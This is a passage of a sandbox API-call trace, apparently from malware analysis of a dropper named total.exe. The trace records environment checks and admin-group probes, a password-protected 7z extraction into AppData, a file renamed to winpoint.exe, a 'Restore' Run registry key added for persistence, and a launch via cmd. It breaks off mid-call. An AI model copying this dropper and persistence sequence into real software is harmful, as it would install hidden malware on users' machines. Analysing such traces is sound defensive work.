hWnd=0x10176, lpClassName=0x3401e0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0158.862] GetWindowTextA (in: hWnd=0x10172, lpString=0x3401e0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0158.862] GetClassNameA (in: hWnd=0x10172, 
lpClassName=0x340df8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0158.863] GetWindowTextA (in: hWnd=0x1016e, lpString=0x340df8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0158.864] GetClassNameA (in: hWnd=0x1016e, lpClassName=0x3401e0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0158.864] GetWindowTextA (in: hWnd=0x1016a, lpString=0x3401e0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0158.865] GetClassNameA (in: hWnd=0x1016a, lpClassName=0x340df8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0158.865] GetWindowTextA (in: hWnd=0x10166, lpString=0x340df8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0158.865] GetClassNameA (in: hWnd=0x10166, lpClassName=0x3401e0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0158.866] GetWindowTextA (in: hWnd=0x10162, lpString=0x3401e0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0158.866] GetClassNameA (in: hWnd=0x10162, lpClassName=0x340df8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0158.866] GetWindowTextA (in: hWnd=0x1015e, lpString=0x340df8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0158.866] GetClassNameA (in: hWnd=0x1015e, lpClassName=0x3401e0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0158.867] GetWindowTextA (in: hWnd=0x1015a, lpString=0x3401e0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0158.867] GetClassNameA (in: hWnd=0x1015a, lpClassName=0x340df8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0158.867] GetWindowTextA (in: hWnd=0x20154, lpString=0x340df8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0158.868] GetClassNameA (in: hWnd=0x20154, lpClassName=0x3401e0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0158.868] GetWindowTextA (in: hWnd=0x2012a, lpString=0x3401e0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0158.868] GetClassNameA (in: hWnd=0x2012a, lpClassName=0x340df8, nMaxCount=1024 | out: lpClassName="IME") returned 3 
[0158.868] GetWindowTextA (in: hWnd=0x10134, lpString=0x340df8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0158.869] GetClassNameA (in: hWnd=0x10134, lpClassName=0x3401e0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0158.869] GetWindowTextA (in: hWnd=0x20024, lpString=0x3401e0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0158.869] GetClassNameA (in: hWnd=0x20024, lpClassName=0x340df8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0158.870] GetWindowTextA (in: hWnd=0x20018, lpString=0x340df8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0158.870] GetClassNameA (in: hWnd=0x20018, lpClassName=0x3401e0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0158.870] GetWindowTextA (in: hWnd=0x10122, lpString=0x3401e0, nMaxCount=1024 | out: lpString="MSCTFIME UI") returned 11 [0158.870] GetClassNameA (in: hWnd=0x10122, lpClassName=0x340df8, nMaxCount=1024 | out: lpClassName="MSCTFIME UI") returned 11 [0158.871] GetWindowTextA (in: hWnd=0x10068, lpString=0x340df8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0158.871] GetClassNameA (in: hWnd=0x10068, lpClassName=0x3401e0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0158.871] GetWindowTextA (in: hWnd=0x10062, lpString=0x3401e0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0158.871] GetClassNameA (in: hWnd=0x10062, lpClassName=0x340df8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0158.872] GetWindowTextA (in: hWnd=0x1005a, lpString=0x340df8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0158.872] GetClassNameA (in: hWnd=0x1005a, lpClassName=0x3401e0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0158.872] GetWindowTextA (in: hWnd=0x10048, lpString=0x3401e0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0158.873] GetClassNameA (in: hWnd=0x10048, lpClassName=0x340df8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0158.873] GetWindowTextA (in: hWnd=0x10042, lpString=0x340df8, 
nMaxCount=1024 | out: lpString="Default IME") returned 11 [0158.873] GetClassNameA (in: hWnd=0x10042, lpClassName=0x3401e0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0158.874] GetWindowTextA (in: hWnd=0x1005e, lpString=0x3401e0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0158.874] GetClassNameA (in: hWnd=0x1005e, lpClassName=0x340df8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0158.874] GetComputerNameA (in: lpBuffer=0x340df8, nSize=0x2f17c0 | out: lpBuffer="AUFDDCNTXWT", nSize=0x2f17c0) returned 1 [0158.882] GetProcAddress (hModule=0x756f0000, lpProcName="GetAccountType") returned 0x756f1215 [0158.887] GetVersion () returned 0x1db10106 [0158.887] GetCurrentThread () returned 0xfffffffe [0158.887] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x8, OpenAsSelf=0, TokenHandle=0x18fba4 | out: TokenHandle=0x18fba4*=0x0) returned 0 [0158.887] GetCurrentProcess () returned 0xffffffff [0158.887] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x18fba4 | out: TokenHandle=0x18fba4*=0x190) returned 1 [0158.887] GetModuleHandleA (lpModuleName="ADVAPI32") returned 0x76650000 [0158.887] GetProcAddress (hModule=0x76650000, lpProcName="CheckTokenMembership") returned 0x7665df04 [0158.887] AllocateAndInitializeSid (in: pIdentifierAuthority=0x18fb88, nSubAuthorityCount=0x2, nSubAuthority0=0x20, nSubAuthority1=0x221, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x18fb98 | out: pSid=0x18fb98*=0x3213e0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0158.887] CheckTokenMembership (in: TokenHandle=0x0, SidToCheck=0x3213e0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x18fb9c | out: 
IsMember=0x18fb9c) returned 1 [0158.887] AllocateAndInitializeSid (in: pIdentifierAuthority=0x18fb88, nSubAuthorityCount=0x2, nSubAuthority0=0x20, nSubAuthority1=0x222, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x18fb98 | out: pSid=0x18fb98*=0x3213e0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0158.888] CheckTokenMembership (in: TokenHandle=0x0, SidToCheck=0x3213e0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x18fb9c | out: IsMember=0x18fb9c) returned 1 [0158.888] AllocateAndInitializeSid (in: pIdentifierAuthority=0x18fb88, nSubAuthorityCount=0x2, nSubAuthority0=0x20, nSubAuthority1=0x223, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x18fb98 | out: pSid=0x18fb98*=0x3213e0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0158.888] CheckTokenMembership (in: TokenHandle=0x0, SidToCheck=0x3213e0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x18fb9c | out: IsMember=0x18fb9c) returned 1 [0158.888] AllocateAndInitializeSid (in: pIdentifierAuthority=0x18fb88, nSubAuthorityCount=0x2, nSubAuthority0=0x20, nSubAuthority1=0x220, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x18fb98 | out: pSid=0x18fb98*=0x3213e0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) 
returned 1 [0158.888] CheckTokenMembership (in: TokenHandle=0x0, SidToCheck=0x3213e0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x18fb9c | out: IsMember=0x18fb9c) returned 1 [0158.888] CloseHandle (hObject=0x190) returned 1 [0158.917] SetFileTime (hFile=0x190, lpCreationTime=0x18fd8c, lpLastAccessTime=0x0, lpLastWriteTime=0x18fd8c) returned 1 [0158.917] CloseHandle (hObject=0x190) returned 1 [0158.934] SetFileTime (hFile=0x190, lpCreationTime=0x18fd8c, lpLastAccessTime=0x0, lpLastWriteTime=0x18fd8c) returned 1 [0158.934] CloseHandle (hObject=0x190) returned 1 [0158.935] SHGetFolderPathA (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x42e3c7 | out: pszPath="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming") returned 0x0 [0158.952] GetProcAddress (hModule=0x75700000, lpProcName="Exec") returned 0x75701000 [0158.952] GetModuleHandleA (lpModuleName="kernel32") returned 0x75c90000 [0158.952] GetProcAddress (hModule=0x75c90000, lpProcName="IsWow64Process") returned 0x75ca195e [0158.952] GetCurrentProcess () returned 0xffffffff [0158.952] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x18f964 | out: Wow64Process=0x18f964) returned 1 [0158.953] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x18fb44, dwRevision=0x1 | out: pSecurityDescriptor=0x18fb44) returned 1 [0158.953] SetSecurityDescriptorDacl (in: pSecurityDescriptor=0x18fb44, bDaclPresent=1, pDacl=0x0, bDaclDefaulted=0 | out: pSecurityDescriptor=0x18fb44) returned 1 [0158.953] CreatePipe (in: hReadPipe=0x18fb98, hWritePipe=0x18fb8c, lpPipeAttributes=0x18fb68, nSize=0x0 | out: hReadPipe=0x18fb98*=0x194, hWritePipe=0x18fb8c*=0x198) returned 1 [0158.953] CreatePipe (in: hReadPipe=0x18fb7c, hWritePipe=0x18fb90, lpPipeAttributes=0x18fb68, nSize=0x0 | out: hReadPipe=0x18fb7c*=0x19c, hWritePipe=0x18fb90*=0x1a0) returned 1 [0158.953] GetStartupInfoA (in: lpStartupInfo=0x18fb00 | out: 
lpStartupInfo=0x18fb00*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0158.953] CreateProcessA (in: lpApplicationName=0x0, lpCommandLine="A.exe x B.7z -psL3117nTGnp393SLZxZy -o\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\" -aoa", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x10, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x18fb00*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x101, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1a0, hStdOutput=0x198, hStdError=0x198), lpProcessInformation=0x18fb58 | out: lpCommandLine="A.exe x B.7z -psL3117nTGnp393SLZxZy -o\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\" -aoa", lpProcessInformation=0x18fb58*(hProcess=0x1a8, hThread=0x1a4, dwProcessId=0x454, dwThreadId=0x764)) returned 1 [0159.044] GetTickCount () returned 0x30260 [0159.044] PeekNamedPipe (in: hNamedPipe=0x194, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18fba0, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18fba0*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0159.044] Sleep (dwMilliseconds=0x64) [0159.148] WaitForSingleObject (hHandle=0x1a8, dwMilliseconds=0x0) returned 0x102 [0159.148] GetExitCodeProcess (in: hProcess=0x1a8, lpExitCode=0x18fb84 | out: lpExitCode=0x18fb84*=0x103) returned 1 [0159.148] PeekNamedPipe (in: hNamedPipe=0x194, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18fba0, lpBytesLeftThisMessage=0x0 | out: 
lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18fba0*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0159.148] PeekNamedPipe (in: hNamedPipe=0x194, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18fba0, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18fba0*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0159.148] Sleep (dwMilliseconds=0x64) [0159.287] WaitForSingleObject (hHandle=0x1a8, dwMilliseconds=0x0) returned 0x102 [0159.287] GetExitCodeProcess (in: hProcess=0x1a8, lpExitCode=0x18fb84 | out: lpExitCode=0x18fb84*=0x103) returned 1 [0159.288] PeekNamedPipe (in: hNamedPipe=0x194, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18fba0, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18fba0*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0159.288] PeekNamedPipe (in: hNamedPipe=0x194, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18fba0, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18fba0*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0159.288] Sleep (dwMilliseconds=0x64) [0159.428] WaitForSingleObject (hHandle=0x1a8, dwMilliseconds=0x0) returned 0x102 [0159.428] GetExitCodeProcess (in: hProcess=0x1a8, lpExitCode=0x18fb84 | out: lpExitCode=0x18fb84*=0x103) returned 1 [0159.428] PeekNamedPipe (in: hNamedPipe=0x194, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18fba0, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18fba0*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0159.428] PeekNamedPipe (in: hNamedPipe=0x194, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18fba0, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18fba0*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0159.429] Sleep (dwMilliseconds=0x64) [0159.568] WaitForSingleObject (hHandle=0x1a8, dwMilliseconds=0x0) returned 
0x102 [0159.569] GetExitCodeProcess (in: hProcess=0x1a8, lpExitCode=0x18fb84 | out: lpExitCode=0x18fb84*=0x103) returned 1 [0159.569] PeekNamedPipe (in: hNamedPipe=0x194, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18fba0, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18fba0*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0159.569] PeekNamedPipe (in: hNamedPipe=0x194, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18fba0, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18fba0*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0159.569] Sleep (dwMilliseconds=0x64) [0159.678] WaitForSingleObject (hHandle=0x1a8, dwMilliseconds=0x0) returned 0x0 [0159.678] GetExitCodeProcess (in: hProcess=0x1a8, lpExitCode=0x18fb84 | out: lpExitCode=0x18fb84*=0x0) returned 1 [0159.678] PeekNamedPipe (in: hNamedPipe=0x194, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18fba0, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18fba0*=0xb2, lpBytesLeftThisMessage=0x0) returned 1 [0159.678] PeekNamedPipe (in: hNamedPipe=0x194, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18fba0, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18fba0*=0xb2, lpBytesLeftThisMessage=0x0) returned 1 [0159.678] GetTickCount () returned 0x304e0 [0159.678] ReadFile (in: hFile=0x194, lpBuffer=0x75703078, nNumberOfBytesToRead=0x3ff, lpNumberOfBytesRead=0x18fba0, lpOverlapped=0x0 | out: lpBuffer=0x75703078*, lpNumberOfBytesRead=0x18fba0*=0xb2, lpOverlapped=0x0) returned 1 [0159.678] WaitForSingleObject (hHandle=0x1a8, dwMilliseconds=0x0) returned 0x0 [0159.678] GetExitCodeProcess (in: hProcess=0x1a8, lpExitCode=0x18fb84 | out: lpExitCode=0x18fb84*=0x0) returned 1 [0159.679] PeekNamedPipe (in: hNamedPipe=0x194, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18fba0, 
lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18fba0*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0159.679] wsprintfA (in: param_1=0x18fa80, param_2="%d" | out: param_1="0") returned 1 [0159.679] lstrcpynA (in: lpString1=0x33611c, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0159.679] CloseHandle (hObject=0x1a4) returned 1 [0159.679] CloseHandle (hObject=0x1a8) returned 1 [0159.679] CloseHandle (hObject=0x198) returned 1 [0159.679] CloseHandle (hObject=0x194) returned 1 [0159.679] CloseHandle (hObject=0x1a0) returned 1 [0159.679] CloseHandle (hObject=0x19c) returned 1 [0159.680] SHGetFolderPathA (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x42e3a0 | out: pszPath="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming") returned 0x0 [0159.680] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\B.cab", iMaxLength=1024 | out: lpString1="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\B.cab") returned="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\B.cab" [0159.680] SHGetFolderPathA (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x42e3a0 | out: pszPath="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming") returned 0x0 [0159.680] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe", iMaxLength=1024 | out: lpString1="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe") returned="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe" [0159.680] SHGetFolderPathA (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x42e3a0 | out: pszPath="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming") returned 0x0 [0159.680] SHGetFolderPathA (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x42e3cf | out: pszPath="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming") returned 0x0 [0159.680] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\B.cab->C:\\Users\\aDU0VK 
IWA5kLS\\AppData\\Roaming\\winpoint.exe", iMaxLength=1024 | out: lpString1="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\B.cab->C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe") returned="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\B.cab->C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe" [0159.701] MoveFileA (lpExistingFileName="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\B.cab" (normalized: "c:\\users\\adu0vk iwa5kls\\appdata\\roaming\\b.cab"), lpNewFileName="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe" (normalized: "c:\\users\\adu0vk iwa5kls\\appdata\\roaming\\winpoint.exe")) returned 1 [0159.702] SHGetFolderPathA (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x42e3a0 | out: pszPath="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming") returned 0x0 [0159.702] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe", iMaxLength=1024 | out: lpString1="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe") returned="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe" [0159.702] FindFirstFileA (in: lpFileName="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe", lpFindFileData=0x42c0c0 | out: lpFindFileData=0x42c0c0) returned 0x2e7a78 [0159.702] FindClose (in: hFindFile=0x2e7a78 | out: hFindFile=0x2e7a78) returned 1 [0159.702] lstrcpynA (in: lpString1=0x40a418, lpString2="Restore", iMaxLength=1024 | out: lpString1="Restore") returned="Restore" [0159.702] lstrcpynA (in: lpString1=0x40a818, lpString2="Software\\Microsoft\\Windows\\CurrentVersion\\Run", iMaxLength=1024 | out: lpString1="Software\\Microsoft\\Windows\\CurrentVersion\\Run") returned="Software\\Microsoft\\Windows\\CurrentVersion\\Run" [0159.702] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x18fbd0, lpdwDisposition=0x0 | out: phkResult=0x18fbd0*=0x19c, 
lpdwDisposition=0x0) returned 0x0 [0159.702] SHGetFolderPathA (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x42e3a0 | out: pszPath="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming") returned 0x0 [0159.703] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe", iMaxLength=1024 | out: lpString1="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe") returned="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe" [0159.703] lstrlenA (lpString="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe") returned 52 [0159.703] RegSetValueExA (in: hKey=0x19c, lpValueName="Restore", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe", cbData=0x35 | out: lpData="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe") returned 0x0 [0159.707] RegCloseKey (hKey=0x19c) returned 0x0 [0159.707] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0159.707] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0159.707] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0159.707] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0159.707] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0159.708] lstrcpynA (in: lpString1=0x40b018, 
lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\nsExec.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\nsExec.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\nsExec.dll" [0159.708] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\nsExec.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\nsExec.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\nsExec.dll" [0159.708] SHGetFolderPathA (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x42e3b1 | out: pszPath="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming") returned 0x0 [0159.708] lstrcpynA (in: lpString1=0x336564, lpString2="cmd /c start \"\" \"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\"", iMaxLength=1024 | out: lpString1="cmd /c start \"\" \"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\"") returned="cmd /c start \"\" \"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\"" [0159.708] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0159.708] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\nsExec.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\nsExec.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\nsExec.dll" [0159.708] lstrcpynA (in: lpString1=0x40a418, lpString2="Exec", iMaxLength=1024 | out: lpString1="Exec") returned="Exec" [0159.708] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\nsExec.dll") returned 0x0 [0159.710] LoadLibraryExA 
